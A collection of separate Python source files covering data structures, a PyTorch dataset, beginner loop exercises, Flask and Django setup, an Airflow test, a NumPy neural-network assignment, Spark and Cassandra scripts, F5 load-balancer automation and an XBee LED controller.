costom_queue.enqueue(root_node)
while not costom_queue.isEmpty():
root = costom_queue.dequeue()
print(root.value.data)
if root.value.left_child is not None:
costom_queue.enqueue(root.value.left_child)
if root.value.right_child is not None:
costom_queue.enqueue(root.value.right_child)
return root.value
def delete_deepest(self, root_node, dNode):
if not root_node:
return 'BT is not exist'
else:
costom_queue = queue.Queue()
costom_queue.enqueue(root_node)
while not costom_queue.isEmpty():
root = costom_queue.dequeue()
if root.value == dNode:
root.value = None
return
if root.value.right_child:
if root.value.right_child is dNode:
root.value.right_child = None
return
else:
costom_queue.enqueue(root.value.right_child)
if root.value.left_child:
if root.value.left_child is dNode:
root.value.left_child = None
return
else:
costom_queue.enqueue(root.value.left_child)
def delete_node(self, root_node, node):
if not root_node:
return 'BT is not exist'
else:
costom_queue = queue.Queue()
costom_queue.enqueue(root_node)
while not costom_queue.isEmpty():
root = costom_queue.dequeue()
if root.value.data == node:
dNode = self.get_deepest_node(root_node)
root.value.data = dNode.data
self.delete_deepest(root_node, dNode)
return 'Deleted'
if root.value.left_child is not None:
costom_queue.enqueue(root.value.left_child)
if root.value.right_child is not None:
costom_queue.enqueue(root.value.right_child)
def delete_bt(self, root_node):
root_node.data = None
root_node.left_child = None
root_node.right_child = None
return 'Deleted'
btree = BTree('Books')
left_child = BTree('Classics')
right_child = BTree('Fantasy')
btree.left_child = left_child
btree.right_child = right_child
btree.insert(btree, 'Ninth House')
print(btree.delete_bt(btree))
btree.level_order(btree)
|
import os
import torch
import numpy as np
import torchvision
from torch.utils.data import Dataset
from PIL import Image
class MangoDetectionData(Dataset):
def __init__(self, img_list, defect_pos_list, defect_y_list, device, transforms = None, ):
self.img_list = img_list
self.defect_pos_list = defect_pos_list
self.defect_y_list = defect_y_list
self.transforms = transforms
return
def __getitem__(self, idx):
img_path = self.img_list[idx]
img = Image.open(img_path).convert('RGB')
boxes = torch.as_tensor(self.defect_pos_list[idx], dtype=torch.float32)
label = torch.tensor(self.defect_y_list[idx], dtype=torch.int64)
img_id = torch.tensor([idx])
area = (boxes[:,3]-boxes[:,1])*(boxes[:,2]-boxes[:,0])
iscrowd = torch.zeros((len(self.defect_y_list[idx])), dtype=torch.int64)
target = {
"boxes": boxes,
"label": label,
"image_id": img_id,
"area": area,
"iscrowd": iscrowd,
"labels": label,
}
if self.transforms is not None:
img, target = self.transforms(img, target)
return img, target
def __len__(self):
return len(self.img_list)
class MangoDetectionDataTest(Dataset):
def __init__(self, img_root, img_list, box_pos):
self.img_root = img_root
self.img_list = img_list
self.box_pos = box_pos
def __getitem__(self, idx):
img_path = os.path.join(self.img_root, self.img_list[idx])
img = Image.open(img_path).convert('RGB')
img = img.crop((self.box_pos[idx]))
transform = torchvision.transforms.ToTensor()
img = transform(img)
return img, None
def __len__(self):
return len(self.img_list)
|
import numpy as np
import pandas as pd
col = 'Preço produto marca desconto'.split()
lin = 'funcionário'.split()
produto =''
venda = pd.DataFrame(data=produto, index=lin, columns=col)
venda.to_excel( 'venda.xlsx', sheet_name='Hoje' )
print( venda )
|
#Praktikum 2
#nomor 3
i = 0
while (i<10):
print('hello world')
i += 1
#nomor 5
i = 2
while (i <=20):
print('Hello world')
i += 2
#nomor 6
i = 0
while True:
print('Hello world')
i += 1
if (i == 10):
break
#nomor 8
#kotak bintang ajaib
kolom = 5
baris = 5
i = 0
while (i<baris):
j=0
while (j<kolom):
print ('*', end='')
j += 1
print('')
i += 1
#nomor 10
i=0
while (i<5):
i += 1
print ('*' * i)
#nomor 11
from random import randint
while True:
bil = randint(0,10)
print(bil)
if bil == 5:
break
#nomor 13
i=0
from random import randint
while True:
bil = randint(0,10)
i += 1
print(bil)
if bil == 5:
print ("jumlah perulangan =", i)
break
|
# https://leetcode.com/problems/sort-array-by-parity/
#
# In-place solution.
# Complexity: runtime O(n), space O(1).
class Solution:
def sortArrayByParity(self, A: List[int]) -> List[int]:
i, j = 0, len(A) - 1
while i < j:
if A[i] % 2 == 0:
i += 1
else:
A[j], A[i] = A[i], A[j]
j -= 1
return A
|
from flask import Flask,redirect, url_for
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager,current_user, logout_user
from functools import wraps
app = Flask(__name__)
app.config.from_object('configuration.DevelopmentConfig')
db = SQLAlchemy(app)
login_manager = LoginManager()
login_manager.init_app(app)
login_manager.login_view = "fauth.login"
def rol_admin_need(f):
@wraps(f)
def wrapper(*args, **kwds):
if current_user.rol.value != "admin":
logout_user()
return redirect(url_for("fauth.login"))
#login_manager.unauthorized()
#return "Tu debes ser admin", 403
return f(*args, **kwds)
return wrapper
from my_app.product.viewsProduct import product
from my_app.product.viewsCategory import category
from my_app.auth.views import auth
from my_app.fauth.views import fauth
#rest api
from my_app.rest_api import product_api
from my_app.rest_api import category_api
#importar vistas
app.register_blueprint(product)
app.register_blueprint(category)
#app.register_blueprint(auth)
app.register_blueprint(fauth)
db.create_all()
@app.template_filter('mydouble')
def mydouble_filter(n:int):
return n*2
#postgres
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import annotations
from importlib import reload
from unittest import mock
import pytest
from airflow.cli import cli_parser
from airflow.cli.commands import celery_command
from tests.test_utils.config import conf_vars
@pytest.mark.integration("celery")
@pytest.mark.backend("mysql", "postgres")
class TestWorkerServeLogs:
@classmethod
def setup_class(cls):
with conf_vars({("core", "executor"): "CeleryExecutor"}):
# The cli_parser module is loaded during test collection. Reload it here with the
# executor overridden so that we get the expected commands loaded.
reload(cli_parser)
cls.parser = cli_parser.get_parser()
@conf_vars({("core", "executor"): "CeleryExecutor"})
def test_serve_logs_on_worker_start(self):
with mock.patch("airflow.cli.commands.celery_command.Process") as mock_process, mock.patch(
"airflow.providers.celery.executors.celery_executor.app"
):
args = self.parser.parse_args(["celery", "worker", "--concurrency", "1"])
with mock.patch("celery.platforms.check_privileges") as mock_privil:
mock_privil.return_value = 0
celery_command.worker(args)
mock_process.assert_called()
@conf_vars({("core", "executor"): "CeleryExecutor"})
def test_skip_serve_logs_on_worker_start(self):
with mock.patch("airflow.cli.commands.celery_command.Process") as mock_popen, mock.patch(
"airflow.providers.celery.executors.celery_executor.app"
):
args = self.parser.parse_args(["celery", "worker", "--concurrency", "1", "--skip-serve-logs"])
with mock.patch("celery.platforms.check_privileges") as mock_privil:
mock_privil.return_value = 0
celery_command.worker(args)
mock_popen.assert_not_called()
|
def check_x(game_board, grid_size, symbol):
"""Checking x for winner"""
for row in game_board:
points_in_row = 0
for element in row:
if element == symbol:
points_in_row += 1
if points_in_row == grid_size:
return True
def check_y(game_board, grid_size, symbol):
"""Checking y for winner"""
y = 0
x = 0
points_in_row = 0
while x < grid_size:
if y > grid_size - 1:
x += 1
y = 0
points_in_row = 0
else:
if game_board[y][x] == symbol:
points_in_row += 1
y += 1
if points_in_row == grid_size:
return True
def check_diagonal_1(game_board, grid_size, symbol):
"""Checking first diagonal for winner"""
#
i = 0
points_in_row = 0
while i < grid_size:
if game_board[i][i] == symbol:
points_in_row += 1
if points_in_row == grid_size:
return True
i += 1
def check_diagonal_2(game_board, grid_size, symbol):
"""Checking second diagonal for winner"""
y = grid_size-1
x = 0
points_in_row = 0
while y >= 0:
if game_board[y][x] == symbol:
points_in_row += 1
if points_in_row == grid_size:
return True
y -= 1
x += 1
def check_for_winner(game_board, grid_size, symbol):
"""Checks the grid's x, y and diagonals for winner """
if check_x(game_board, grid_size, symbol):
return True
if check_y(game_board, grid_size, symbol):
return True
if check_diagonal_1(game_board, grid_size, symbol):
return True
if check_diagonal_2(game_board, grid_size, symbol):
return True
|
from interface import *
# ================================ 2.1.1 ReLU ================================
class ReLU(Layer):
def forward(self, inputs):
"""
:param inputs: np.array((n, ...)), input values,
n - batch size, ... - arbitrary input shape
:return: np.array((n, ...)), output values,
n - batch size, ... - arbitrary output shape (same as input)
"""
# your code here \/
result = np.copy(inputs)
result[result < 0] = 0
return result
# your code here /\
def backward(self, grad_outputs):
"""
:param grad_outputs: np.array((n, ...)), dLoss/dOutputs,
n - batch size, ... - arbitrary output shape
:return: np.array((n, ...)), dLoss/dInputs,
n - batch size, ... - arbitrary input shape (same as output)
"""
# your code here \/
inputs = self.forward_inputs
result = np.zeros(grad_outputs.shape)
result[inputs > 0] = 1
return result * grad_outputs
# your code here /\
# ============================== 2.1.2 Softmax ===============================
class Softmax(Layer):
EPS = 1e-15
def forward(self, inputs):
"""
:param inputs: np.array((n, d)), input values,
n - batch size, d - number of units
:return: np.array((n, d)), output values,
n - batch size, d - number of units
"""
# your code here \/
if inputs.size == 0:
max = 0
else:
max = np.max(inputs)
exps = np.exp(inputs - max)
sums = np.expand_dims(np.sum(exps, axis=1), axis=1)
return exps / (sums + self.EPS)
# your code here /\
def backward(self, grad_outputs):
"""
:param grad_outputs: np.array((n, d)), dLoss/dOutputs,
n - batch size, d - number of units
:return: np.array((n, d)), dLoss/dInputs,
n - batch size, d - number of units
"""
# your code here \/
outputs = self.forward_outputs
batch_size = grad_outputs.shape[0]
size = grad_outputs.shape[1]
along_i = np.repeat(outputs[:, :, np.newaxis], size, axis=2)
along_j = np.repeat(outputs[:, np.newaxis, :], size, axis=1)
din_out = along_i * (np.repeat(np.eye(size)[np.newaxis, :, :], batch_size, axis=0) - along_j)
return np.einsum('ijk,ik->ij', din_out, grad_outputs)
# your code here /\
# =============================== 2.1.3 Dense ================================
class Dense(Layer):
def __init__(self, units, *args, **kwargs):
super().__init__(*args, **kwargs)
self.output_shape = (units,)
self.weights, self.weights_grad = None, None
self.biases, self.biases_grad = None, None
def build(self, *args, **kwargs):
super().build(*args, **kwargs)
input_units, = self.input_shape
output_units, = self.output_shape
# Register weights and biases as trainable parameters
# Note, that the parameters and gradients *must* be stored in
# self.<p> and self.<p>_grad, where <p> is the name specified in
# self.add_parameter
self.weights, self.weights_grad = self.add_parameter(
name='weights',
shape=(input_units, output_units),
initializer=he_initializer(input_units)
)
self.biases, self.biases_grad = self.add_parameter(
name='biases',
shape=(output_units,),
initializer=np.zeros
)
def forward(self, inputs):
"""
:param inputs: np.array((n, d)), input values,
n - batch size, d - number of input units
:return: np.array((n, c)), output values,
n - batch size, c - number of output units
"""
# your code here \/
batch_size, input_units = inputs.shape
output_units, = self.output_shape
return np.einsum('ij,jk->ik', inputs, self.weights) + self.biases
# your code here /\
def backward(self, grad_outputs):
"""
:param grad_outputs: np.array((n, c)), dLoss/dOutputs,
n - batch size, c - number of output units
:return: np.array((n, d)), dLoss/dInputs,
n - batch size, d - number of input units
"""
# your code here \/
batch_size, output_units = grad_outputs.shape
input_units, = self.input_shape
inputs = self.forward_inputs
# Don't forget to update current gradients:
# dLoss/dWeights
self.weights_grad[...] = np.einsum('ij,ik->jk', self.forward_inputs, grad_outputs) / batch_size
# dLoss/dBiases
self.biases_grad[...] = np.mean(grad_outputs, axis=0)
return np.einsum('ij,kj->ki', self.weights, grad_outputs)
# your code here /\
# ============================ 2.2.1 Crossentropy ============================
class CategoricalCrossentropy(Loss):
EPS = 1e-9
def __call__(self, y_gt, y_pred):
"""
:param y_gt: np.array((n, d)), ground truth (correct) labels
:param y_pred: np.array((n, d)), estimated target values
:return: np.array((n,)), loss scalars for batch
"""
# your code here \/
batch_size, output_units = y_gt.shape
return -np.einsum('ij,ij->i', y_gt, np.log((y_pred + self.EPS)))
# your code here /\
def gradient(self, y_gt, y_pred):
"""
:param y_gt: np.array((n, d)), ground truth (correct) labels
:param y_pred: np.array((n, d)), estimated target values
:return: np.array((n, d)), gradient loss to y_pred
"""
# your code here \/
return -np.einsum('ij,ij->ij', y_gt, 1 / (y_pred + self.EPS))
# your code here /\
# ================================ 2.3.1 SGD =================================
class SGD(Optimizer):
def __init__(self, lr):
self._lr = lr
def get_parameter_updater(self, parameter_shape):
"""
:param parameter_shape: tuple, the shape of the associated parameter
:return: the updater function for that parameter
"""
def updater(parameter, parameter_grad):
"""
:param parameter: np.array, current parameter values
:param parameter_grad: np.array, current gradient, dLoss/dParam
:return: np.array, new parameter values
"""
# your code here \/
assert parameter_shape == parameter.shape
assert parameter_shape == parameter_grad.shape
return parameter - self._lr * parameter_grad
# your code here /\
return updater
# ============================ 2.3.2 SGDMomentum =============================
class SGDMomentum(Optimizer):
def __init__(self, lr, momentum=0.0):
self._lr = lr
self._momentum = momentum
def get_parameter_updater(self, parameter_shape):
"""
:param parameter_shape: tuple, the shape of the associated parameter
:return: the updater function for that parameter
"""
def updater(parameter, parameter_grad):
"""
:param parameter: np.array, current parameter values
:param parameter_grad: np.array, current gradient, dLoss/dParam
:return: np.array, new parameter values
"""
# your code here \/
assert parameter_shape == parameter.shape
assert parameter_shape == parameter_grad.shape
assert parameter_shape == updater.inertia.shape
# Don't forget to update the current inertia tensor:
updater.inertia[...] = updater.inertia * self._momentum + self._lr * parameter_grad
return parameter - updater.inertia
# your code here /\
updater.inertia = np.zeros(parameter_shape)
return updater
# ======================= 2.4 Train and test on MNIST ========================
def train_mnist_model(x_train, y_train, x_valid, y_valid):
# your code here \/
# 1) Create a Model
loss = CategoricalCrossentropy()
optimizer = SGDMomentum(lr=0.002, momentum=0.9)
model = Model(loss, optimizer)
# 2) Add layers to the model
# (don't forget to specify the input shape for the first layer)
model.add(Dense(units=16, input_shape=(784,)))
model.add(ReLU())
model.add(Dense(units=10))
model.add(Softmax())
# 3) Train and validate the model using the provided data
model.fit(x_train, y_train, 16, 3, x_valid=x_valid, y_valid=y_valid)
# your code here /\
return model
# ============================================================================
|
# coding=utf-8
r"""Apply edit operations from editt2t to the initial sentences."""
import argparse
import sys
parser = argparse.ArgumentParser(description='Read edit operations from stdin and apply them to sentences in trg_test.')
parser.add_argument('-t','--trg_test', help='Text file with initial sentences.', required=False)
args = parser.parse_args()
EOS_ID = 1
def ins_op(s, pos, token):
"""Returns a copy of s after an insertion."""
return s[:pos] + [token] + s[pos:]
def sub_op(s, pos, token):
"""Returns a copy of s after a substitution."""
ret = list(s)
ret[pos] = token
return ret
def del_op(s, pos):
"""Returns a copy of s after a deletion."""
return s[:pos] + s[pos+1:]
def apply_ops(line_nr, line):
ops = map(int, line.strip().split())
sentence = [EOS_ID]
if trg_sentences is not None:
sentence = trg_sentences[line_nr]
for op in ops:
pos = (op // 100000) % 1000
token = op % 100000
op_type = op // 100000000
if op_type == 1: # Insertion
sentence = ins_op(sentence, pos, token)
elif op_type == 2: # Substitution
sentence = sub_op(sentence, pos, token)
elif op_type == 3: # Deletion
sentence = del_op(sentence, pos)
else:
sys.exit("Illegal operation %d" % op)
if sentence and sentence[-1] == EOS_ID:
sentence = sentence[:-1]
return " ".join(map(str, sentence))
trg_sentences = None
if args.trg_test:
trg_sentences = []
with open(args.trg_test) as f:
for line in f:
trg_sentences.append(map(int, line.strip().split()) + [EOS_ID])
for line_nr, line in enumerate(sys.stdin):
if "|" in line: # n-best list format
parts = line.strip().split("|")
parsed = apply_ops(int(parts[0].strip()), parts[3])
print("|".join(parts[:3] + [" " + parsed + " "] + parts[4:]))
else:
print(apply_ops(line_nr, line))
|
import matplotlib
matplotlib.use('Agg')
from cassandra.cluster import Cluster
cluster = Cluster()
session = cluster.connect('e08')
import matplotlib.pyplot as plt
#Les stations
query_taxi = session.execute("SELECT id FROM TAXI;")
taxi = []
nb = []
#La concentration des station, par annee et par periode de l'annee
for user_row in query_taxi:
query= "SELECT COUNT(tripid) as nb FROM TRIP3 WHERE year=2013 AND month=9 AND taxiid=" + str(user_row.id) + ";"
query_trip3 = session.execute(query)
taxi.append(int(user_row.id))
for user_row2 in query_trip3:
nb.append(int(user_row2.nb))
#************************************PLOT HISTOGRAMS******************************#
plt.clf()
plt.bar(taxi, nb)
plt.title("TRIPS BY TAXI")
plt.savefig('Figures/histogram_trip_by_taxi.png')
|
# Generated by Django 3.0.3 on 2020-02-16 11:01
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('core', '0010_auto_20200216_0850'),
]
operations = [
migrations.RenameModel(
old_name='Requests',
new_name='RequestAPI',
),
]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
from pyspark.sql.functions import udf
from pyspark.sql import SparkSession
from pyspark.sql.types import StringType, DoubleType
LOG = logging.getLogger(__name__)
def price_range(brand):
if brand in ['Samsung', 'Apple']:
return 'High Price'
elif brand == 'MI':
return 'Mid Price'
else:
return 'Low Price'
def main():
spark = SparkSession.builder.appName('Data Processing').getOrCreate()
df = spark.read.csv('/tmp/sample_data.csv', inferSchema=True, header=True)
brand_udf = udf(price_range, StringType())
LOG.info("Columns: {0}".format(df.columns))
LOG.info("Count: {0}".format(df.count()))
# Check schema of dataframe.
df.printSchema()
# Read two columns using select method.
df.select('age', 'mobile').show()
# decribe for analyzing the dataframe.
df.describe().show()
# Add a new column.
df.withColumn('age_after_10_yrs', (df['age'] + 10)).show(10, False)
# Add a new column and change the datatype of column.
df.withColumn('age_double', df['age'].cast(DoubleType())).show(10, False)
# Filtering data
df.filter(df['mobile'] == 'Vivo').select('age', 'ratings', 'mobile').show()
# Filtering data
df.filter(df['mobile'] == 'Vivo').filter(df['experience'] > 10).show()
# Distinct values in Column
df.select('mobile').distinct().show()
# Count
LOG.info("Distinct values count: {0}".format(
df.select('mobile').distinct().count()))
# Group by
df.groupBy('mobile').count().show(10, False)
# Order by
df.groupBy('mobile').count().orderBy('count', ascending=False).show(10,
False)
# Mean, Sum and Min values
df.groupBy('mobile').mean().show(10, False)
df.groupBy('mobile').sum().show(10, False)
df.groupBy('mobile').max().show(10, False)
df.groupBy('mobile').min().show(10, False)
# Aggregations
df.groupBy('mobile').agg({'experience': 'sum'}).show(10, False)
# UDF
df.withColumn('price_range', brand_udf(df['mobile'])).show(10, False)
# lambda udf
age_udf = udf(lambda age: "young" if age <= 30 else "senior", StringType())
df.withColumn("age_group", age_udf(df['age'])).show(10, False)
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO)
main()
|
from naya.json import parse, parse_string, stream_array
__all__ = ["parse", "parse_string", "stream_array"] |
#!/usr/bin/python
# F5 functions used for JnJ F5 Network Automation
# Author: apined12@its.jnj.com
# Name: jnjf5tools
import sys
import time
import os
from base64 import b64decode
def vs_has_http(obj, vipname):
'''
This function checks if an HTTP profile is applied to an F5 VIP.
obj = BIGIP connection instance
vipname = virtual server name, e.g. VS-10.0.209.2-80
'''
vipname = '/Common/%s' % vipname
try:
profs = obj.LocalLB.VirtualServer.get_profile(virtual_servers = [vipname])
except Exception, e:
print e
# Check for http profile applied to virtual server
ptypes = [z['profile_type'] for x in profs for z in x]
if 'PROFILE_TYPE_HTTP' in ptypes:
return True
else:
return False
def show_irule(obj, vipname):
'''
This function displays the iRules associated with a virtual server
'''
try:
rules = obj.LocalLB.VirtualServer.get_rule(virtual_servers = [vipname])
return rules
except Exception, e:
print e
def create_irule(obj, viprule, vrule_content):
'''
This function create a new iRule.
obj = BIGIP connection instance
viprule = Name of new iRule,e.g. Redirect_VS-10.0.209.6-80_v1.0
vrule_content = Contents of new iRule stored in an external file; may be created using
standard iRule Jinja template
'''
try:
obj.LocalLB.Rule.create(rules = [{'rule_name': viprule, 'rule_definition': vrule_content}])
return None
except Exception, e:
print e
def mod_vip_irule(obj, vipname, curviprule, viprule):
'''
This function replaces an existing iRule with a new iRule supplied from
the variable input file.
obj = BIGIP connection instance
vipname = virtual server name, e.g. VS-10.0.209.2-80
curviprule = Name of existing iRule that needs to be replaced
viprule = Name of modified iRule to replace the existing iRule,e.g. Redirect_VS-10.0.209.6-80_v1.0
'''
lsrules = obj.LocalLB.VirtualServer.get_rule(virtual_servers = [vipname])
for lrule in lsrules:
for y in lrule:
if y['rule_name'] == curviprule:
try:
obj.LocalLB.VirtualServer.remove_rule(virtual_servers = [vipname], \
rules = lsrules)
except Exception, e:
print e
y['rule_name'] = viprule
try:
obj.LocalLB.VirtualServer.add_rule(virtual_servers = [vipname], \
rules = lsrules)
except Exception, e:
print e
return None
def add_vip_irule(obj, vipname, viprule):
'''
This function adds a new iRule to an existing virtual server
obj = BIGIP connection instance
vipname = virtual server name, e.g. VS-10.0.209.2-80
viprule = Name of modified iRule to replace the existing iRule,e.g. Redirect_VS-10.0.209.6-80_v1.0
'''
count = 0
check_priority = []
rules = obj.LocalLB.VirtualServer.get_rule(virtual_servers = [vipname])
if rules != [[]]:
for rule in rules[count]:
check_priority.append(rule['priority'])
count += 1
try:
obj.LocalLB.VirtualServer.add_rule(virtual_servers = [vipname], \
rules = [[{'rule_name': viprule, 'priority': (max(check_priority) + 1)}]])
except Exception, e:
print e
else:
try:
obj.LocalLB.VirtualServer.add_rule(virtual_servers = [vipname], \
rules = [[{'rule_name': viprule, 'priority': 0}]])
except Exception, e:
print e
return None
def modify_pool(obj, plname, plmem, plminmem):
'''
This function adds/remove pool members fro exisitng pool based on the mode value in the
variable file.
obj = BIGIP connection instance
plname = pool name
plmem = list of pool members
plminmem = Minimum number of pool members in a priority group before switching to next priority group
'''
pool = '/Common/%s' % plname
pmadd = []
pmdel = []
prio = []
# The loop below creates lists of pool members and pool priorities
for m in plmem:
pm = {}
pm['address'] = '/Common/%s' % m['address']
pm['port'] = m['port']
if m['mode'] == "add":
pmadd.append(pm)
else:
pmdel.append(pm)
prio.append(m['priority'])
try:
getpools = obj.LocalLB.Pool.get_list()
if pool in getpools and pmadd != []:
obj.LocalLB.Pool.add_member_v2(pool_names = [pool], members = [pmadd])
if pool in getpools and pmdel != []:
obj.LocalLB.Pool.remove_member_v2(pool_names = [pool], members = [pmdel])
if plminmem != 0:
obj.LocalLB.Pool.set_minimum_active_member(pool_names = [pool], values = [plminmem])
obj.LocalLB.Pool.set_member_priority(pool_names = [pool], members = [pmadd], priorities = [prio])
return None
except Exception, e:
print e
def generate_csr(obj, c_email, c_cn, c_ctry, c_st, c_loc, c_org, c_ou, c_san, ver):
'''
This function generates a 2048-bit public key and a CSR that can be used for certificate signing
request generation from a CA. This function does not include SAN which uses a different set of
API and can only work for v12 F5 devices.
'''
subject = {}
subject['common_name'] = c_cn
subject['country_name'] = c_ctry
subject['state_name'] = c_st
subject['locality_name'] = c_loc
subject['organization_name'] = c_org
subject['division_name'] = c_ou
# Generate key below; do not create CSR here so we can add email address in the API call below
try:
obj.Management.KeyCertificate.key_generate_v2(mode = 'MANAGEMENT_MODE_DEFAULT', \
keys = [{'id': c_cn,'key_type': 'KTYPE_RSA_PUBLIC', 'bit_length': 2048, \
'security': 'STYPE_NORMAL','curve_name': 'ELLIPTIC_CURVE_NONE'}], \
x509_data = [subject], create_optional_cert_csr = False, overwrite = False)
except Exception, e:
print e
# Generate CSR below
try:
if 'v12' in ver and c_san != []:
obj.Management.KeyCertificate.certificate_request_generate_with_extensions( \
mode = 'MANAGEMENT_MODE_DEFAULT', \
csrs = [{'id': c_cn, 'email': c_email, 'challenge_password': None}], \
x509_data = [subject], \
extensions = [c_san], overwrite = False)
elif 'v10' in ver or 'v11' in ver or ('v12' in ver and c_san == []):
obj.Management.KeyCertificate.certificate_request_generate(mode = 'MANAGEMENT_MODE_DEFAULT', \
csrs = [{'id': c_cn, 'email': c_email, 'challenge_password': None}], \
x509_data = [subject], overwrite = False)
except Exception, e:
print e
# Export CSR file to /shared/tmp directory on device
try:
obj.Management.KeyCertificate.certificate_request_export_to_file(mode = 'MANAGEMENT_MODE_DEFAULT', \
csr_ids = [c_cn], file_names = ['/shared/tmp/' + c_cn + '.csr'], overwrite = False)
except Exception, e:
print e
csr_location = '/shared/tmp/' + c_cn + '.csr'
return csr_location
def config_sync(obj):
'''
This function will synchronize device ocnfiguration between redundant pair of F5 devices.
'''
rd = obj.System.Failover.is_redundant()
if rd:
fs = obj.System.Failover.get_failover_state()
else:
return None
if fs == "FAILOVER_STATE_ACTIVE":
dl = obj.Management.DeviceGroup.get_list()
dt = obj.Management.DeviceGroup.get_type(device_groups = dl)
# Determine local device name and sync device group
for x in zip(dl, dt):
if x[1] == "DGT_FAILOVER":
device_grp = x[0]
local_dev = obj.Management.Device.get_local_device()
try:
obj.System.ConfigSync.synchronize_to_group_v2(group = device_grp, \
device = local_dev, force = True)
except Exception, e:
return None
def save_config(obj, savefile, saveflag):
'''
This function saves the current configuration changes on the F5. Save configuration filename
supplied will be ignored due to save_flag of SAVE_HIGH_LEVEL_CONFIG
See F5 API Reference for detail
'''
try:
obj.System.ConfigSync.save_configuration(filename = savefile, save_flag = saveflag)
return None
except Exception, e:
print e
def file_download(obj,src_file,dst_file,chunk_size,buff = 1048576):
'''
This function will download a file from the F5 to the Ansible host that made the request.
This function is courtesy of Eric Flores from F5.
obj = BIGIP connection instance
src_file = location of file to be downloaded from F5
dst_file = location of file on local server
chunk_size = download size for each chunk
buff(optional) = sieze of file write buffer; default sieze is 1MB
'''
# Set begining vars
foffset = 0
timeout_error = 0
fbytes = 0
# Open temp file for writing, default buffer size is 1MB
f_dst = open(dst_file + '.tmp','w',buff)
while True:
try:
chunk = obj.System.ConfigSync.download_file(file_name = src_file, \
chunk_size = chunk_size, \
file_offset = foffset)
except:
timeout_error += 1
# Is this the 3rd connection attempt?
if (timeout_error >= 3):
# Close tmp file & delete, raise error
f_dst.close()
os.remove(dst_file + '.tmp')
raise
else:
# Otherwise wait 2 seconds before retry
time.sleep(2)
continue
# Reset error counter after a good connect
timeout_error = 0
# Write contents to file
fchunk = b64decode(chunk['return']['file_data'])
f_dst.write(fchunk)
fbytes += sys.getsizeof(fchunk) - 40
# Check to see if chunk is end of file
fprogress = chunk['return']['chain_type']
if (fprogress == 'FILE_FIRST_AND_LAST') or (fprogress == 'FILE_LAST' ):
# Close file, rename from name.tmp to name
f_dst.close()
os.rename(dst_file + '.tmp' , dst_file)
return fbytes
# set new file offset
foffset = chunk['file_offset']
|
import binascii
import string
import itertools
import threading
import sys
import traceback
import struct
from xbee import ZigBee
class Timeout(Exception):
def __init__(self, msg):
self.msg = msg
class TransmitError(Exception):
def __init__(self, msg):
self.msg = msg
class FrameConsumer():
def __init__(self):
self._observers = []
def attach(self, observer):
if not observer in self._observers:
self._observers.append(observer)
def detach(self, observer):
try:
self._observers.remove(observer)
except ValueError:
pass
#noinspection PyBroadException
def receive_frame(self, frame):
print "## received frame: "
for x in frame:
print "## " + '{0: <16}'.format(x) + ": " + binascii.hexlify(frame[x])
for observer in self._observers:
try:
observer.receive_frame(frame)
except:
print "swallowed exception"
exc_type, exc_value, exc_traceback = sys.exc_info()
print repr(traceback.format_exception(exc_type, exc_value,
exc_traceback))
class Waiter(threading.Thread):
def __init__(self, observable, timeout):
threading.Thread.__init__(self)
self.timeout = timeout
self.result = None
self.exception = None
self.observable = observable
self.observable.attach(self)
self.done = threading.Event()
def detach(self):
self.observable.detach(self)
def run(self):
if not self.done.wait(self.timeout):
self.result = "ERR"
self.exception = Timeout("Thread was waiting for " + str(self.timeout))
self.detach()
class WaitForResponse(Waiter):
def __init__(self, observable, timeout, frame_id):
Waiter.__init__(self, observable, timeout)
self.frame_id = frame_id
self.response = None
def receive_frame(self, frame):
if "frame_id" in frame and frame["frame_id"] == chr(self.frame_id):
self.done.set()
print "found response"
if frame["deliver_status"] == b'\x00':
self.result = "OK"
else:
self.result = "ERR"
self.exception = TransmitError(
"Received Deliver Status: " + binascii.hexlify(frame["deliver_status"]) + " for frame " + str(
self.frame_id))
self.response = frame
self.detach()
class WaitForConfirm(Waiter):
def __init__(self, observable, timeout, expected_data):
Waiter.__init__(self, observable, timeout)
self.expected_data = expected_data
self.confirm = None
def receive_frame(self, frame):
if "rf_data" in frame and frame["rf_data"] == self.expected_data:
self.done.set()
print "found confirm"
self.result = "OK"
self.confirm = frame
self.detach()
class LedRing():
COMMANDS = {
"full": b'\x00',
"color": b'\x01',
"pos": b'\x02',
"jump": b'\x03',
"level": b'\x04',
"level_red": b'\x05',
"level_green": b'\x06',
"level_blue": b'\x07',
"red": b'\x08',
"green": b'\x09',
"blue": b'\x0a',
"rot_left": b'\x0b',
"rot_right": b'\x0c',
"rot_off": b'\x0d',
"set_fade": b'\x0e',
"fade_off": b'\x0f',
"brightness": b'\x10',
"use_gamma": b'\x11',
"gamma_off": b'\x12',
}
REQUEST = b'\x01'
RECEIVED_COMMAND = b'\x02'
def __init__(self, serial, addr, addr_long):
self.frame_consumer = FrameConsumer()
self.xbee = ZigBee(serial, callback=self.frame_consumer.receive_frame, escaped=True)
self.addr = addr
self.addr_long = addr_long
self.frame_cycle = itertools.cycle(range(1, 255))
def _tx(self, command, data=None):
cmd = self.COMMANDS[command]
if not data is None:
cmd = cmd + data
frame_id = self.frame_cycle.next()
print "## sending " + binascii.hexlify(cmd) + " len: " + str(len(cmd)) + " to node " + binascii.hexlify(
self.addr_long)
wait_response = WaitForResponse(self.frame_consumer, 60, frame_id)
wait_confirm = WaitForConfirm(self.frame_consumer, 60, self.RECEIVED_COMMAND + self.COMMANDS[command])
wait_confirm.start()
wait_response.start()
self.xbee.tx(
frame_id=chr(frame_id),
dest_addr_long=self.addr_long,
dest_addr=self.addr,
data=cmd
)
wait_response.join(60)
print "response " + str(wait_response.result)
if wait_response.exception:
raise wait_response.exception
wait_confirm.join(60)
print "confirm " + str(wait_confirm.result)
if wait_confirm.exception:
raise wait_confirm.exception
def rotate_counter_clockwise(self):
self._tx("rot_right")
def rotate_clockwise(self):
self._tx("rot_left")
def rotate_off(self):
self._tx("rot_off")
def set_red(self):
